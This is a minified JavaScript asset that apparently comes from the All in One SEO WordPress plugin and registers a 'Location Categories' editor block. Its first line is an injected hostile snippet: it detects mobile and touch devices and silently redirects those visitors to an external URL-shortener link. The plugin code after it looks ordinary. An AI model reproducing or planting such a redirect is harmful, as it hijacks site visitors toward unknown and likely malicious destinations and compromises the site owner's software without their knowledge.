(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{h as u,r as p}from"../js/utils.4347bc5f.js";import{b as a,y as m}from"../js/app-core.c8323d51.js";import{_ as s,a as d}from"../js/vendor-other.39e59221.js";import"../js/vendor-vue-ui.232c7c36.js";import"../js/vendor-lodash.03129cfe.js";const g=u`
<svg width="20" height="19" viewBox="0 0 20 19" fill="none" xmlns="http://www.w3.org/2000/svg">
	<path d="M17.2001 7.2L19.0361 9.036L17.7641 10.308L10.0001 2.544L2.23611 10.308L0.964111 9.036L10.0001 0L14.8001 4.8V2.4H17.2001V7.2ZM10.0001 4.248L17.2001 11.436V18.6H2.80011V11.436L10.0001 4.248ZM12.4001 17.4V11.4H7.60011V17.4H12.4001Z" fill="black"/>
</svg>
`,f="aioseo/locationcategories",y="AIOSEO Local - Location Categories",L="Displays location categories.",_="aioseo",S={},b={html:!1},h={name:f,title:y,description:L,category:_,attributes:S,supports:b},r="all-in-one-seo-pack",{name:c,title:v,description:w,category:R,supports:x,attributes:E}=h,e=window.wp,$=e.serverSideRender||e.components.ServerSideRender,V=e.data.withSelect,k=e.components.Disabled,B={title:v,description:w,category:R,supports:x,attributes:E,icon:g,edit:V(function(o){const i=a();return{categories:o("core").getEntityRecords("taxonomy",i.aioseo.localBusiness.taxonomyName)}})(function(o){const n=m().options.localBusiness?.locations.general.multiple;let{categories:t}=o;if(n&&t===null)return React.createElement("div",null,s("Loading...",r));if(t=t===null?[]:t,!n)return React.createElement("div",null,s("Please enable multiple locations before using this block.",r));if(t.length===0){const l=a();return React.createElement("div",null,d(s("No %1$s found",r),l.aioseo.localBusiness.taxonomyPluralLabel))}return React.createElement("div",null,React.createElement(k,null,React.createElement($,{block:c})))}),save:function(){return null}};p({name:c,settings:B});
